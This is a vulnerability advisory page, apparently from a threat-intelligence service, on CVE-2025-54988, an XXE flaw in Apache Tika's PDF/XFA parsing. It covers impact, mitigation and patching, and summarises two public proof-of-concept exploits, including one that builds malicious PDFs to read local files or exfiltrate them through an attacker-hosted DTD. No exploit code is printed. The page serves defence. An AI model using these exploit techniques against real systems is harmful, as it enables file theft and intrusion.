Skip to main content
Live Webinar with SANS (June 25)— Agentic CTI Automation for Fun & ProfitRegister Free
Mallory
CriticalPublic exploit

XXE in Apache Tika tika-parser-pdf-module via crafted XFA in PDF

IdentifiersCVE-2025-54988CWE-611· Improper Restriction of XML…

CVE-2025-54988 is an XML External Entity (XXE) injection vulnerability in Apache Tika’s PDF parsing path, originally attributed to the tika-parser-pdf-module. Apache Tika versions 1.13 through 3.2.1 are affected. The flaw can be triggered when Tika processes a crafted PDF containing malicious XML Forms Architecture (XFA) content, causing unsafe XML parsing of attacker-controlled data. Successful exploitation may allow external entity resolution during parsing. The issue affects all platforms and also impacts products and packages that depend on the vulnerable Tika PDF parsing module, including packages such as tika-parsers-standard-modules, tika-parsers-standard-package, tika-app, tika-grpc, and tika-server-standard. The provided content also notes later Apache guidance that the underlying vulnerable logic and fix were in tika-core, with CVE-2025-66516 expanding scope, but CVE-2025-54988 specifically refers to the XXE reachable via the PDF/XFA parsing path.

Share:
For your environment

Are you exposed to this one?

Mallory correlates every CVE against your assets, your vendors, and active adversary campaigns. Know which vulnerabilities matter for you, not just which ones are loud.

ANALYST BRIEF

Impact, mitigation & remediation

What it means. What to do now. Patch path, mitigations, and the assume-compromise checklist.

Impact

What an attacker gets, and what they’ve been doing with it.

An attacker can use the XXE condition to read sensitive local data accessible to the Tika process and to induce the vulnerable system to make outbound requests to internal services or third-party hosts, i.e., SSRF-style behavior. Impact therefore includes confidentiality loss through file disclosure and indirect network interaction with internal resources. In downstream products that expose Tika parsing to authenticated or unauthenticated upload/ingest workflows, this can also create a pivot for internal reconnaissance or data exfiltration.

Mitigation

If you can’t patch tonight, do this now.

Until patching is complete, prevent untrusted PDF ingestion through Apache Tika, especially PDFs containing XFA forms. Isolate Tika parsing in a sandbox/container with minimal filesystem permissions and no unnecessary network reachability. Apply strict egress filtering from parsing hosts to reduce SSRF impact. Where feasible, disable or remove PDF attachment parsing paths that rely on the vulnerable module, and monitor parsing workflows for anomalous outbound requests or suspicious PDF submissions.

Remediation

Patch, then assume compromise.

Upgrade Apache Tika to version 3.2.2 or later, as stated in the advisory. Because the vulnerable PDF parser module is consumed transitively by multiple Tika packages, ensure deployed applications actually pick up the fixed dependency set rather than updating only a top-level package declaration. The content also indicates that later Apache guidance tied the underlying fix to tika-core, so environments should verify that both the parser-related components and the corresponding fixed core version are deployed where applicable.
PUBLIC EXPLOITS

Exploits

2 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos.

VALID 2 / 2 TOTALView more in app
cve-2025-54988-VulnTikaProjectMaturityPoCVerified exploit

This repository is a proof-of-concept (PoC) project for demonstrating an XXE (XML External Entity) vulnerability in Apache Tika version 3.2.1 (CVE-2025-54988). The project is a Java Spring Boot application that exposes HTTP endpoints for file upload and processing. The main endpoint of interest is /api/extract-text, which uses Apache Tika to extract text from uploaded files. If a specially crafted malicious PDF is uploaded to this endpoint, it will trigger the XXE vulnerability in Tika, potentially allowing attackers to read arbitrary files or perform other XXE-based attacks. The repository includes Docker support for easy deployment, as well as scripts for building and running the application. The codebase is small, with the main logic contained in TikaController.java. The /api/detect-type endpoint is also exposed but does not trigger the vulnerability. The repository is intended for security testing and demonstration purposes.

galoryberDisclosed Dec 17, 2025javabashnetwork
POC-CVE-2025-54988MaturityPoCVerified exploit

This repository provides a proof-of-concept (POC) exploit for CVE-2025-54988, targeting XML External Entity (XXE) vulnerabilities in PDF parsers that support XFA forms. The main script, 'xfa_xxe_poc_gen.py', is a Python tool that generates malicious PDF files containing XFA forms with embedded XXE payloads. It supports two modes: 'file' mode for local file read (e.g., extracting /etc/passwd from the target system), and 'oob' (out-of-band) mode, which leverages an attacker-hosted DTD to exfiltrate file contents to a remote server via HTTP/HTTPS. The script can also generate the necessary DTD file for OOB attacks. The README provides usage instructions and example commands. The repository is structured simply, with one Python exploit script and a README. The exploit is a POC and does not include a customizable payload delivery mechanism beyond the generated PDF and DTD files.

mgthuramoemyintDisclosed Sep 4, 2025pythonfilenetwork
EXPOSURE SURFACE

Affected products & vendors

Products and vendors Mallory has correlated with this vulnerability. Open in Mallory to drill down to specific CPE configurations and version ranges.

VendorProductType
Apache Software FoundationTikaapplication

Vendor-confirmed product mapping. Mallory continuously reconciles this list against your asset inventory.

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets are affected, which adversaries are exploiting it right now, which detections to deploy, and what to do tonight.
Exposure mapping

Query your assets running an affected version, and investigate the blast radius.

Threat actor evidence

Every observed campaign linking this CVE to a named adversary.

Associated malware

Malware families riding this exploit, with evidence and IOCs.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

Vendor-by-vendor mapping

Cross-references every affected SKU, including bundled OEM variants.

Social activity31

Community discussion across Reddit, Mastodon, and other social sources.